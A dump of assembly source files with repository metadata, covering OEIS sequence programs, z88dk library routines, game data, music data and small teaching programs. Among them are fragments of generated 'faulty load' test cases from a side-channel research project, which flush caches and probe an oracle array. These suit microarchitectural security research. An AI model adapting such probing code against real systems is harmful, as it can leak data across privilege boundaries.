sub $2,1
mul $2,$3
add $1,$2
mov $4,$3
cmp $4,0
mov $5,$3
add $5,$4
div $1,$5
div $1,4
div $2,$5
sub $3,1
max $3,1
l... | 13.923077 | 97 | 0.569061 |
308d0f582d022e34729d44cb3a7254f03ab84340 | 391 | asm | Assembly | oeis/185/A185175.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/185/A185175.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/185/A185175.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A185175: a(n) = A010815(7*n + 5).
; Submitted by Christian Krause
; 1,-1,0,1,0,-1,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,1,0,0,0,0,0,-1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
mul $0,7
add $0,5
seq $0,10815 ; From Euler... | 48.875 | 207 | 0.565217 |
4b9e1b45768e819ef5327f7d5be330cf421a4f52 | 4,404 | asm | Assembly | c6ers/interlnk/fxlib/loader.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | c6ers/interlnk/fxlib/loader.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | c6ers/interlnk/fxlib/loader.asm | minblock/msdos | 479ffd237d9bb7cc83cb06361db2c4ef42dfbac0 | [
"Apache-2.0"
] | null | null | null | ;* Loader sent in upload.
;* Generated by running "make" in load subdirectory.
INCLUDE model.inc
.CODE text
PUBLIC C loader_start
PUBLIC C loader_end
PUBLIC C loader_bios_port
loader_start LABEL BYTE
DB 0fcH,0b8H,000H,033H,0cdH,021H,052H,... | 62.914286 | 82 | 0.779519 |
d69182133b58441c17c33187eeb282cabb252e3a | 1,339 | asm | Assembly | src/factorial.asm | earaujoassis/machos-assembly | eafd98e68c957bb51b0c8c546d3ec4b52bfe44a6 | [
"MIT"
] | 1 | 2021-11-06T02:31:06.000Z | 2021-11-06T02:31:06.000Z | src/factorial.asm | earaujoassis/machos-assembly | eafd98e68c957bb51b0c8c546d3ec4b52bfe44a6 | [
"MIT"
] | null | null | null | src/factorial.asm | earaujoassis/machos-assembly | eafd98e68c957bb51b0c8c546d3ec4b52bfe44a6 | [
"MIT"
] | null | null | null | global _main
default rel
section .text
factorial_entry:
cmp rdi, 1 ; Check if n <= 1 and store ate `rdi`
jnbe factorial_recursive ; If not, perform a recursive call
mov rax, 1 ; Return 1, stored at `rax`
ret
factorial_recursive:
push rdi ... | 36.189189 | 97 | 0.500373 |
b5764cf67a8d8c4b661b97ede477e5e4a76de2bb | 1,860 | asm | Assembly | Test-files/bubblesort.asm | anchittandon/Implementation-of-a-5-stage-RISC-processor | a4a907cadf854ba70229e78ec64cf1f5502faf43 | [
"MIT"
] | 1 | 2019-12-14T21:21:57.000Z | 2019-12-14T21:21:57.000Z | Test-files/bubblesort.asm | anchittandon/Implementation-of-a-5-stage-RISC-processor | a4a907cadf854ba70229e78ec64cf1f5502faf43 | [
"MIT"
] | null | null | null | Test-files/bubblesort.asm | anchittandon/Implementation-of-a-5-stage-RISC-processor | a4a907cadf854ba70229e78ec64cf1f5502faf43 | [
"MIT"
] | null | null | null | .main:
mov r0, 0 @0000
mov r1, 12 @ replace 12 with the number to be sorted
st r1, 0[r0]
mov r1, 7 @ replace 7 with the number to be sorted
st r1, 4[r0]
mov r1, 11 @ replace 11 with the number to be sorted
st r1, 8[r0]
mov r1, 9 @ replace 9 with the number to b... | 45.365854 | 139 | 0.565054 |
d36fa19d4ff91323334b0643ab5911e515e87dce | 470 | asm | Assembly | oeis/184/A184012.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/184/A184012.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/184/A184012.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A184012: n + floor(sqrt(5n-4)); complement of A184013.
; 2,4,6,8,9,11,12,14,15,16,18,19,20,22,23,24,26,27,28,29,31,32,33,34,36,37,38,39,40,42,43,44,45,46,48,49,50,51,52,54,55,56,57,58,59,61,62,63,64,65,66,68,69,70,71,72,73,74,76,77,78,79,80,81,82,84,85,86,87,88,89,90,92,93,94,95,96,97,98,99,101,102,103,104,105,106,10... | 33.571429 | 316 | 0.642553 |
62ecbb80cdf4be0d99bfd4ad36b241f8b34f8bde | 732 | asm | Assembly | data/pokemon/base_stats/tauros.asm | Karkino/KarkCrystal16 | 945dde0354016f9357e9d3798312cc6efa52ff7a | [
"blessing"
] | null | null | null | data/pokemon/base_stats/tauros.asm | Karkino/KarkCrystal16 | 945dde0354016f9357e9d3798312cc6efa52ff7a | [
"blessing"
] | null | null | null | data/pokemon/base_stats/tauros.asm | Karkino/KarkCrystal16 | 945dde0354016f9357e9d3798312cc6efa52ff7a | [
"blessing"
] | null | null | null | db 0 ; species ID placeholder
db 75, 100, 95, 110, 40, 70
; hp atk def spd sat sdf
db NORMAL, NORMAL ; type
db 45 ; catch rate
db 211 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F0 ; gender ratio
db 100 ; unknown 1
db 20 ; step cycles to hatch
db 5 ; unknown 2
INCBIN "gfx/pokemon/tauros/fr... | 33.272727 | 274 | 0.718579 |
ab1e6888ac2ef88758ba373af824a86c5fa318e3 | 684 | asm | Assembly | oeis/015/A015188.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/015/A015188.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/015/A015188.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A015188: Sum of (Gaussian) q-binomial coefficients for q=-19.
; Submitted by Christian Krause
; 1,2,-16,688,111136,89882432,-275004084736,4228048101810688,245826835826279382016,71807813126925810352535552,-79325152089697863954203470053376,440258301458598565100624737135157198848,9240608384586184341279607973207159152665... | 32.571429 | 423 | 0.80848 |
723ef6ae76b06800a9dd8210b85a033713e213d5 | 340 | asm | Assembly | programs/oeis/342/A342280.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/342/A342280.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/342/A342280.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A342280: a(n) = A001952(2*n+1).
; 3,10,17,23,30,37,44,51,58,64,71,78,85,92,99,105,112,119,126,133,139,146,153,160,167,174,180,187,194,201,208,215,221,228,235,242,249,256,262,269,276,283,290,297,303,310,317,324,331,338,344,351,358,365,372
mul $0,2
seq $0,187393 ; a(n) = floor(r*n), where r = 4 + sqrt(8); complement o... | 48.571429 | 205 | 0.670588 |
7b8de60d3c12f8c8e80ecd19794f8f8be2a4e288 | 1,824 | asm | Assembly | libsrc/target/sam/stdio/generic_console_cls.asm | ahjelm/z88dk | c4de367f39a76b41f6390ceeab77737e148178fa | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/target/sam/stdio/generic_console_cls.asm | C-Chads/z88dk | a4141a8e51205c6414b4ae3263b633c4265778e6 | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/target/sam/stdio/generic_console_cls.asm | C-Chads/z88dk | a4141a8e51205c6414b4ae3263b633c4265778e6 | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z | MODULE generic_console_cls
SECTION code_driver
PUBLIC generic_console_cls
EXTERN __zx_screenmode
EXTERN __zx_console_attr
EXTERN __sam_MODE3_attr
EXTERN __sam_MODE4_attr
EXTERN __sam_graphics_pagein
EXTERN __sam_graphics_pageout
EXTERN l_dcal
EXTERN SCREEN_BASE
... | 17.708738 | 63 | 0.524123 |
563fdaaa84348663b3127ce9447191c9afc9e0c2 | 1,212 | asm | Assembly | programs/oeis/076/A076897.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/076/A076897.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/076/A076897.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A076897: a(1)=1, a(n)=n-a(floor(3n/4)).
; 1,1,2,2,3,4,4,4,5,6,7,7,8,8,8,9,10,10,11,12,13,13,13,14,15,15,15,15,16,17,18,18,19,19,20,21,22,23,23,23,24,24,25,25,26,27,27,27,28,28,28,29,30,31,31,32,33,33,34,34,35,35,36,37,38,38,39,40,41,41,41,41,42,43,43,43,44,45,45,46,47,47,48,48,49,49,49,50,51,51,51,51,52,53,54,55,56,5... | 55.090909 | 812 | 0.646865 |
3eb49aa7fa1b0871519f5835b072881960c8e4fd | 415 | asm | Assembly | libsrc/_DEVELOPMENT/target/hbios/driver/terminal/rc_01_output_hbios0/rc_01_output_hbios0_iterm_msg_bs.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/target/hbios/driver/terminal/rc_01_output_hbios0/rc_01_output_hbios0_iterm_msg_bs.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/target/hbios/driver/terminal/rc_01_output_hbios0/rc_01_output_hbios0_iterm_msg_bs.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z | INCLUDE "config_private.inc"
SECTION code_driver
SECTION code_driver_terminal_output
PUBLIC rc_01_output_hbios0_iterm_msg_bs
EXTERN rc_01_output_hbios0_oterm_msg_putc_send
rc_01_output_hbios0_iterm_msg_bs:
; backspace
; can use: af, bc, de, hl, ix
call backspace
ld c,' '
call rc_01_output_hbios0_... | 17.291667 | 47 | 0.807229 |
f21b7b0ea57a905efe2b07f5233ffb47fe0711a4 | 316 | asm | Assembly | toolchain/stdlibc/__startup.asm | VladisM/MARK_II-SoC | 58a441675729d4036b503c2a4743fd181daaf5af | [
"MIT"
] | 25 | 2017-07-21T08:56:19.000Z | 2021-05-09T22:12:15.000Z | toolchain/stdlibc/__startup.asm | C-ArenA/MARK_II | 58a441675729d4036b503c2a4743fd181daaf5af | [
"MIT"
] | 30 | 2016-07-12T22:12:58.000Z | 2018-06-03T14:08:07.000Z | toolchain/stdlibc/__startup.asm | C-ArenA/MARK_II | 58a441675729d4036b503c2a4743fd181daaf5af | [
"MIT"
] | 5 | 2017-11-20T14:46:22.000Z | 2020-04-01T10:48:10.000Z | .IMPORT main
__startup:
OR R0 R0 R1
OR R0 R0 R2
OR R0 R0 R3
OR R0 R0 R4
OR R0 R0 R5
OR R0 R0 R6
OR R0 R0 R7
OR R0 R0 R8
OR R0 R0 R9
OR R0 R0 R10
OR R0 R0 R11
OR R0 R0 R12
.MVI SP 0x7FF
OR SP R0 R13
CALL main
__startup_halt:
BZ R0 __startup_halt
| 13.166667 | 24 | 0.560127 |
bb8688a947e52e721b9b7ccfef00089660314514 | 847 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_un_/i7-7700_9_0x48_notsx.log_28_1812.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_un_/i7-7700_9_0x48_notsx.log_28_1812.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_un_/i7-7700_9_0x48_notsx.log_28_1812.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r13
push %r14
push %r8
push %r9
push %rdx
// Faulty Load
mov $0x93e, %r8
clflush (%r8)
nop
nop
nop
nop
xor %r9, %r9
vmovaps (%r8), %ymm0
vextracti128 $1, %ymm0, %xmm0
vpextrq $1, %xmm0, %r10
lea oracles, %r8
and ... | 18.021277 | 120 | 0.637544 |
c50bce60cc7e8a49ec862ca90413a81925ce9121 | 1,705 | asm | Assembly | programs/oeis/152/A152746.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/152/A152746.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/152/A152746.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A152746: Six times hexagonal numbers: 6*n*(2*n-1).
; 0,6,36,90,168,270,396,546,720,918,1140,1386,1656,1950,2268,2610,2976,3366,3780,4218,4680,5166,5676,6210,6768,7350,7956,8586,9240,9918,10620,11346,12096,12870,13668,14490,15336,16206,17100,18018,18960,19926,20916,21930,22968,24030,25116,26226,27360,28518,29700,30906... | 213.125 | 1,613 | 0.831672 |
d3efbcda2525d48a06cb691588cb516f6aca97b5 | 2,246 | asm | Assembly | Script/2.asm | Tarak-Mahmud/CSE331L_Section_7_Summer20_NSU_Final | 2c06a0d98f6b6929cfe0f7a6ef3876d749bc0fef | [
"MIT"
] | null | null | null | Script/2.asm | Tarak-Mahmud/CSE331L_Section_7_Summer20_NSU_Final | 2c06a0d98f6b6929cfe0f7a6ef3876d749bc0fef | [
"MIT"
] | null | null | null | Script/2.asm | Tarak-Mahmud/CSE331L_Section_7_Summer20_NSU_Final | 2c06a0d98f6b6929cfe0f7a6ef3876d749bc0fef | [
"MIT"
] | null | null | null | .MODEL SMALL
.STACK 100H
.DATA
PROMPT_1 DB 'Enter hexadecimal : $'
PROMPT_2 DB 0DH,0AH,'The equivalent 16-bit binary number is : $'
ILLEGAL DB 0DH,0AH,'Illegal hex number. Try again : $'
COUNT DB ?
.CODE
MAIN PROC
MOV AX, @DATA ; initialize DS
MOV DS, AX
LEA DX, PROMPT_1 ; load and display the string PROMPT_1
MOV AH,... | 29.168831 | 64 | 0.700801 |
4999ffcc22e0c6f9364668d00e9d5c1bf96dcc96 | 698 | asm | Assembly | oeis/146/A146313.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/146/A146313.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/146/A146313.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A146313: a(n) = cosh( (2n - 1)*arcsinh(sqrt(2)) )^2 = 1 - cos( (2n - 1)*arcsin(sqrt(3)) )^2.
; Submitted by Christian Krause
; 3,243,23763,2328483,228167523,22358088723,2190864527283,214682365584963,21036680962799043,2061380051988721203,201994208413931878803,19793371044513335401443,1939548368153892937462563,190055946... | 43.625 | 463 | 0.812321 |
3fc381fff0113f1e84b89ae757848914768c8429 | 1,972 | asm | Assembly | sim/asm/fn52.asm | nanamake/avr_cpu | b557e64f471bbcabe7ef104e24ae9b3024cddcba | [
"MIT"
] | 2 | 2021-01-21T01:36:26.000Z | 2022-03-30T21:01:04.000Z | sim/asm/fn52.asm | nanamake/avr_cpu | b557e64f471bbcabe7ef104e24ae9b3024cddcba | [
"MIT"
] | null | null | null | sim/asm/fn52.asm | nanamake/avr_cpu | b557e64f471bbcabe7ef104e24ae9b3024cddcba | [
"MIT"
] | 1 | 2020-03-05T06:04:24.000Z | 2020-03-05T06:04:24.000Z | ;-------------------
; test for sbis
;-------------------
.equ ioreg0 = 0x00 ; i/o register dummy
.equ ioreg1 = 0x01 ; i/o register dummy
.equ ioreg2 = 0x02 ; i/o register dummy
.equ ioreg3 = 0x1f ; i/o register dummy
;-------------------
ldi r28,0xff
ldi r29,0xff
movw r2 ,r28
mov... | 19.72 | 44 | 0.490365 |
b93e428b02c94458f569c7d19217c6f496ef95f5 | 227 | asm | Assembly | libsrc/_DEVELOPMENT/adt/ba_priority_queue/c/sccz80/ba_priority_queue_top.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 8 | 2017-01-18T12:02:17.000Z | 2021-06-12T09:40:28.000Z | libsrc/_DEVELOPMENT/adt/ba_priority_queue/c/sccz80/ba_priority_queue_top.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 1 | 2017-03-06T07:41:56.000Z | 2017-03-06T07:41:56.000Z | libsrc/_DEVELOPMENT/adt/ba_priority_queue/c/sccz80/ba_priority_queue_top.asm | teknoplop/z88dk | bb03fbfd6b2ab0f397a1358559089f9cd3706485 | [
"ClArtistic"
] | 3 | 2017-03-07T03:19:40.000Z | 2021-09-15T17:59:19.000Z |
; int ba_priority_queue_top(ba_priority_queue_t *q)
SECTION code_clib
SECTION code_adt_ba_priority_queue
PUBLIC ba_priority_queue_top
EXTERN asm_ba_priority_queue_top
defc ba_priority_queue_top = asm_ba_priority_queue_top
| 18.916667 | 54 | 0.885463 |
52965aaf5b7597ad71022bc0c52c172fce76227a | 1,260 | asm | Assembly | src/stars/examples/floats/quadratic.asm | kevintmcdonnell/stars | ce0df570c546a8490ef4f9ceeb84c8e1132b2791 | [
"MIT"
] | 9 | 2020-11-05T21:26:09.000Z | 2022-03-04T15:24:40.000Z | src/stars/examples/floats/quadratic.asm | kevintmcdonnell/stars | ce0df570c546a8490ef4f9ceeb84c8e1132b2791 | [
"MIT"
] | 7 | 2020-11-06T15:59:40.000Z | 2021-08-31T16:36:43.000Z | src/stars/examples/floats/quadratic.asm | kevintmcdonnell/stars | ce0df570c546a8490ef4f9ceeb84c8e1132b2791 | [
"MIT"
] | 1 | 2021-07-13T21:55:02.000Z | 2021-07-13T21:55:02.000Z | ########## Evaluates Ax^2 + Bx + C ##########
# Values of x, A, B, C are hard-coded
.data
err: .asciiz "Error: root(s) are imaginary"
.align 2
A: .float 2.0
B: .float -6.0
C: .float -3.0
four: .float 4.0
zero: .float 0.0
.text
main:
la $t0, A # load word at the address of x into $t0
l.s $f1, 0($t0)
l.s $f2... | 17.027027 | 52 | 0.498413 |
39cc6c10bbe92e585d45746f57853be907d81467 | 293 | asm | Assembly | programs/oeis/065/A065603.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/065/A065603.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/065/A065603.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A065603: Transposition diameter: maximal number of moves in an optimal sorting of n objects by moving blocks.
; 0,1,2,3,3,4,4,5,5,6,6,7,8,8,9
pow $0,2
lpb $0
mov $2,$0
lpb $0
add $0,$2
mul $0,2
div $0,5
add $1,72
trn $2,32
sub $2,2
lpe
lpe
div $1,72
mov $0,$1
| 16.277778 | 111 | 0.587031 |
7ca76fdb9573c944ad172c9cb54f32ff6a7c1dec | 590 | asm | Assembly | oeis/001/A001962.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/001/A001962.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/001/A001962.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A001962: A Beatty sequence: floor(n * (sqrt(5) + 3)).
; Submitted by Jon Maiga
; 5,10,15,20,26,31,36,41,47,52,57,62,68,73,78,83,89,94,99,104,109,115,120,125,130,136,141,146,151,157,162,167,172,178,183,188,193,198,204,209,214,219,225,230,235,240,246,251,256,261,267,272,277,282,287,293,298,303,308,314,319,324,329,335,3... | 73.75 | 381 | 0.7 |
9e5a7bb73b8e77c52e65ab415112aea8a5cf6e4f | 8,025 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_185.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_185.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_185.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r8
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x5e23, %r8
clflush (%r8)
nop
nop
nop
inc %rbp
mov $0x6162636465666768, %r12
movq %r12, (%r8)
cmp %rbx, %rbx
lea addresses_D_ht+0x119ff, %rsi
lea addresses_normal_ht+0x14e25, %... | 35.50885 | 2,999 | 0.655202 |
ce5c10d15d2ba2bea31414a461c72d418c616fa7 | 303 | asm | Assembly | programs/oeis/052/A052255.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/052/A052255.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/052/A052255.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A052255: Partial sums of A050484.
; 1,13,81,345,1155,3267,8151,18447,38610,75790,140998,250614,428298,707370,1133730,1769394,2696727,4023459,5888575,8469175,11988405,16724565,23021505,31300425
lpb $0
mov $2,$0
sub $0,1
seq $2,50484 ; Partial sums of A051946.
add $1,$2
lpe
add $1,1
mov $0,$1
| 25.25 | 158 | 0.729373 |
0a49f191e9d713e29c47eb3c3cbd302e452575f8 | 5,346 | asm | Assembly | s1/music-original/Mus90 - Continue Screen.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 9 | 2017-10-09T20:28:45.000Z | 2021-06-29T21:19:20.000Z | s1/music-original/Mus90 - Continue Screen.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 12 | 2018-08-01T13:52:20.000Z | 2022-02-21T02:19:37.000Z | s1/music-original/Mus90 - Continue Screen.asm | Cancer52/flamedriver | 9ee6cf02c137dcd63e85a559907284283421e7ba | [
"0BSD"
] | 2 | 2018-02-17T19:50:36.000Z | 2019-10-30T19:28:06.000Z | Mus90_Continue_Screen_Header:
smpsHeaderStartSong 1
smpsHeaderVoice Mus90_Continue_Screen_Voices
smpsHeaderChan $06, $03
smpsHeaderTempo $01, $07
smpsHeaderDAC Mus90_Continue_Screen_DAC
smpsHeaderFM Mus90_Continue_Screen_FM1, $E5, $08
smpsHeaderFM Mus90_Continue_Screen_FM2, $E8,... | 31.263158 | 72 | 0.621586 |
9588560e1bba2d01a0575bedeb6bd8faa27f4630 | 502 | asm | Assembly | examples/hello-world.asm | jodalyst/riscemu | cede73c3c93c1d00168aa020dd9d982a213e3572 | [
"MIT"
] | 9 | 2021-07-08T11:22:55.000Z | 2022-01-30T10:32:48.000Z | examples/hello-world.asm | jodalyst/riscemu | cede73c3c93c1d00168aa020dd9d982a213e3572 | [
"MIT"
] | 8 | 2021-12-03T18:16:19.000Z | 2022-03-31T20:49:09.000Z | examples/hello-world.asm | jodalyst/riscemu | cede73c3c93c1d00168aa020dd9d982a213e3572 | [
"MIT"
] | 2 | 2022-01-16T05:50:04.000Z | 2022-03-23T21:27:27.000Z | ; hello-world.asm
; print "hello world" to stdout and exit
.data
msg: .ascii "Hello world\n"
.text
addi a0, zero, 1 ; print to stdout
addi a1, zero, msg ; load msg address
addi a2, zero, 12 ; write 12 bytes
addi a7, zero, SC... | 35.857143 | 60 | 0.501992 |
c16b79f17b9cf9d6eced8d2fe8a170c3925043f2 | 989 | asm | Assembly | Irvine/Examples/ch08/32 bit/ModSum32_traditional/ModSum/_prompt.asm | alieonsido/ASM_TESTING | 4d5e2a3e11d921eeb50d69bbe4352cfc0e99afa7 | [
"Apache-2.0"
] | null | null | null | Irvine/Examples/ch08/32 bit/ModSum32_traditional/ModSum/_prompt.asm | alieonsido/ASM_TESTING | 4d5e2a3e11d921eeb50d69bbe4352cfc0e99afa7 | [
"Apache-2.0"
] | null | null | null | Irvine/Examples/ch08/32 bit/ModSum32_traditional/ModSum/_prompt.asm | alieonsido/ASM_TESTING | 4d5e2a3e11d921eeb50d69bbe4352cfc0e99afa7 | [
"Apache-2.0"
] | null | null | null | ; Prompt For Integers (_prompt.asm)
INCLUDE Irvine32.inc
.code
;----------------------------------------------------
PromptForIntegers PROC
; Prompts the user for an array of integers and fills
; the array with the user's input.
; Receives:
; ptrPrompt:PTR BYTE ; prompt string
; ptrArray:PTR DWORD ; point... | 24.121951 | 54 | 0.625885 |
46ac5872fcf49501b69dc0bc081fb1eefdd18db2 | 50 | asm | Assembly | src/main/fragment/mos6502-common/qvoz1_derefidx_vbuyy=_deref_qvoc2.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | 2 | 2022-03-01T02:21:14.000Z | 2022-03-01T04:33:35.000Z | src/main/fragment/mos6502-common/qvoz1_derefidx_vbuyy=_deref_qvoc2.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | null | null | null | src/main/fragment/mos6502-common/qvoz1_derefidx_vbuyy=_deref_qvoc2.asm | jbrandwood/kickc | d4b68806f84f8650d51b0e3ef254e40f38b0ffad | [
"MIT"
] | null | null | null | lda {c2}
sta ({z1}),y
iny
lda {c2}+1
sta ({z1}),y
| 8.333333 | 12 | 0.52 |
b676fa904298512ec13042087fff7893c7b9b53a | 717 | asm | Assembly | oeis/086/A086148.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
